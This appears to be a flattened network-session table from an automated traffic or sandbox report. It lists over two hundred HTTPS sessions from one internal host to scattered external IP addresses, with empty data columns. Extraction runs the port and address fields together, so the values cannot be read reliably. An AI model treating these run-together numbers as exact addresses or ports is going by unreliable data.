                                      20739192.168.2.1451518161.20.69.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20740192.168.2.14557129.211.112.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20741192.168.2.144277882.153.42.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20742192.168.2.1452242122.226.38.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20743192.168.2.1444498153.35.76.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20744192.168.2.143697424.193.103.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20745192.168.2.144984664.232.101.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20746192.168.2.1450576117.32.200.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20747192.168.2.1444324158.73.40.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20748192.168.2.1453662219.109.13.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20749192.168.2.1441518213.28.214.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20750192.168.2.14585565.10.21.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20751192.168.2.1442254117.90.119.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20752192.168.2.1451104130.112.118.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20753192.168.2.144389837.81.234.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20754192.168.2.144147861.211.47.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20755192.168.2.1434756204.110.60.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20756192.168.2.145168643.83.138.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20757192.168.2.143583073.201.151.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20758192.168.2.145963281.149.71.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20759192.168.2.14355864.21.123.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20760192.168.2.144735480.69.87.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20761192.168.2.145307440.112.83.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20762192.168.2.1436292205.175.36.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20763192.168.2.145056094.123.245.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20764192.168.2.145523060.66.230.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20765192.168.2.1460600220.103.76.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20766192.168.2.1447014206.173.200.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20767192.168.2.1448984208.244.186.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20768192.168.2.1436876133.189.85.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20769192.168.2.1438676122.109.119.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20770192.168.2.14395604.82.45.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20771192.168.2.144255663.67.89.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20772192.168.2.144700663.88.125.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20773192.168.2.145841435.68.152.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20774192.168.2.1460218173.29.100.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20775192.168.2.143655864.46.250.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20776192.168.2.145634827.108.195.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20777192.168.2.1446728212.129.56.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20778192.168.2.1448888138.7.212.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20779192.168.2.1454984184.156.28.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20780192.168.2.144219276.161.248.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20781192.168.2.14405289.69.154.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20782192.168.2.144832448.39.207.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20783192.168.2.1455488186.84.52.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20784192.168.2.1435072138.172.209.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20785192.168.2.145999072.117.247.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20786192.168.2.1456618114.242.169.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20787192.168.2.145859242.52.1.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20788192.168.2.1438758102.203.247.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20789192.168.2.1434394202.21.252.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20790192.168.2.145385462.212.49.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20791192.168.2.145607238.132.12.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20792192.168.2.144880031.230.227.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20793192.168.2.1436362121.46.159.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20794192.168.2.1434876207.98.255.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20795192.168.2.1459876179.160.177.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20796192.168.2.144501649.116.94.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20797192.168.2.1455146175.229.46.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20798192.168.2.145047298.209.199.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20799192.168.2.1443748168.99.222.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20800192.168.2.145365889.138.30.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20801192.168.2.1444886175.8.94.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20802192.168.2.1456368212.117.44.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20803192.168.2.1457464174.183.51.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20804192.168.2.143853861.101.217.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20805192.168.2.145849679.176.126.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20806192.168.2.143645813.241.128.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20807192.168.2.143427423.252.82.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20808192.168.2.1440114202.160.87.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20809192.168.2.144306482.219.248.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20810192.168.2.144716485.117.201.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20811192.168.2.1434072220.164.233.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20812192.168.2.1444906171.34.11.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20813192.168.2.144998852.73.119.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20814192.168.2.1455800171.118.96.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20815192.168.2.145781078.175.146.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20816192.168.2.1452096126.227.72.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20817192.168.2.1444512169.96.102.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20818192.168.2.1457380169.174.107.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20819192.168.2.145639897.85.46.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20820192.168.2.144941041.166.115.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20821192.168.2.1441154175.77.236.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20822192.168.2.1440498209.130.81.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20823192.168.2.1433190178.161.135.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20824192.168.2.1459966100.148.14.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20825192.168.2.145765497.69.215.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20826192.168.2.1451870145.210.77.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20827192.168.2.14455362.192.24.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20828192.168.2.144515693.170.61.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20829192.168.2.143445651.49.71.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20830192.168.2.1455394218.173.194.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20831192.168.2.144267263.70.199.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20832192.168.2.144558451.99.169.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20833192.168.2.144897679.9.28.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20834192.168.2.145631861.252.187.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20835192.168.2.144959253.78.192.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20836192.168.2.1458402169.233.178.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20837192.168.2.1443944187.148.69.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20838192.168.2.1458390218.105.25.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20839192.168.2.1438068204.60.96.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20840192.168.2.1455266112.112.154.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20841192.168.2.143842879.142.201.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20842192.168.2.1434110217.154.225.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20843192.168.2.1444578138.158.92.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20844192.168.2.143464253.163.81.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20845192.168.2.1451574114.83.24.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20846192.168.2.144670444.113.203.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20847192.168.2.143412048.205.110.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20848192.168.2.1436782134.142.176.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20849192.168.2.1446668103.145.193.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20850192.168.2.1447260209.16.132.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20851192.168.2.1439906129.78.158.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20852192.168.2.1456122190.17.190.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20853192.168.2.1459976137.22.23.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20854192.168.2.1447266191.253.174.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20855192.168.2.144014475.10.178.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20856192.168.2.145943469.246.134.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20857192.168.2.143430098.196.52.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20858192.168.2.1458230112.132.125.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20859192.168.2.144660494.229.161.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20860192.168.2.1456716132.54.39.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20861192.168.2.1437750152.193.108.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20862192.168.2.1442480146.28.196.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20863192.168.2.1443874145.87.85.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20864192.168.2.144996657.146.111.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20865192.168.2.1437656130.123.118.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20866192.168.2.14414881.125.152.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20867192.168.2.1434998196.164.132.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20868192.168.2.143592447.144.221.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20869192.168.2.143597879.29.176.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20870192.168.2.1441258185.30.71.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20871192.168.2.1455520134.91.84.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20872192.168.2.143993276.168.43.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20873192.168.2.1439042128.14.32.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20874192.168.2.143563220.122.25.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20875192.168.2.145564062.91.153.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20876192.168.2.144223412.32.181.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20877192.168.2.1445492149.138.194.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20878192.168.2.1456556217.3.184.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20879192.168.2.14502108.55.15.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20880192.168.2.145654466.53.9.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20881192.168.2.145518819.59.29.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20882192.168.2.1447820174.70.139.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20883192.168.2.1436630142.170.217.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20884192.168.2.144569434.184.99.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20885192.168.2.143453071.82.159.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20886192.168.2.144282476.212.125.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20887192.168.2.145272245.10.7.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20888192.168.2.1433630221.81.40.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20889192.168.2.144576294.241.68.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20890192.168.2.14341342.148.38.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20891192.168.2.144356445.145.103.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20892192.168.2.1436508120.183.253.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20893192.168.2.1457430171.251.167.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20894192.168.2.1454952148.132.13.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20895192.168.2.1439686123.94.122.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20896192.168.2.1460636101.45.48.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20897192.168.2.144985669.51.244.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20898192.168.2.1437868175.109.193.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20899192.168.2.1446776217.231.202.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20900192.168.2.145297691.52.55.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20901192.168.2.1435358142.99.37.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20902192.168.2.1460350150.218.149.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20903192.168.2.1460240157.178.219.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20904192.168.2.144381839.19.96.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20905192.168.2.1445334142.225.213.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20906192.168.2.1459412126.122.57.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20907192.168.2.1444378109.221.138.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20908192.168.2.145007246.139.235.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20909192.168.2.144134688.117.98.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20910192.168.2.144816693.139.91.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20911192.168.2.144237640.8.58.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20912192.168.2.144894895.200.131.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20913192.168.2.1434214137.224.168.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20914192.168.2.143575081.31.196.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20915192.168.2.143986823.125.110.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20916192.168.2.144709082.97.200.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20917192.168.2.143279088.156.245.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20918192.168.2.1439406144.159.122.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20919192.168.2.1447490191.130.163.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20920192.168.2.14420828.125.186.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20921192.168.2.1444822119.206.219.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20922192.168.2.1436844103.117.135.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20923192.168.2.144274850.66.54.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20924192.168.2.1446712108.174.108.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20925192.168.2.145194652.69.64.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20926192.168.2.1457916179.124.118.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20927192.168.2.144302094.134.194.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20928192.168.2.1454108191.160.192.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20929192.168.2.1450888116.215.80.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20930192.168.2.1434950119.246.121.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20931192.168.2.145610678.179.135.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20932192.168.2.1441512153.137.176.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20933192.168.2.1457768121.181.9.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20934192.168.2.145440838.250.185.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20935192.168.2.1455166126.30.138.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20936192.168.2.1445624159.107.160.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20937192.168.2.144984825.118.119.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20938192.168.2.144904069.43.3.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20939192.168.2.145649644.255.196.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20940192.168.2.1437538194.171.101.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20941192.168.2.1446332135.55.171.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20942192.168.2.145082449.14.186.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20943192.168.2.144644471.8.180.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20944192.168.2.143598285.41.117.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20945192.168.2.1456564216.6.179.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20946192.168.2.144327818.238.182.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20947192.168.2.14533962.20.164.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20948192.168.2.144905082.202.71.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20949192.168.2.1438386158.36.27.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20950192.168.2.143325419.101.170.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20951192.168.2.1444246113.14.119.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20952192.168.2.1437460159.175.132.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20953192.168.2.145814034.89.76.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20954192.168.2.1460150204.111.164.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20955192.168.2.1448098217.10.45.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20956192.168.2.1452232195.96.14.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20957192.168.2.145721046.178.215.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20958192.168.2.1460696183.248.64.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20959192.168.2.145122063.123.21.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20960192.168.2.1441732196.226.106.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
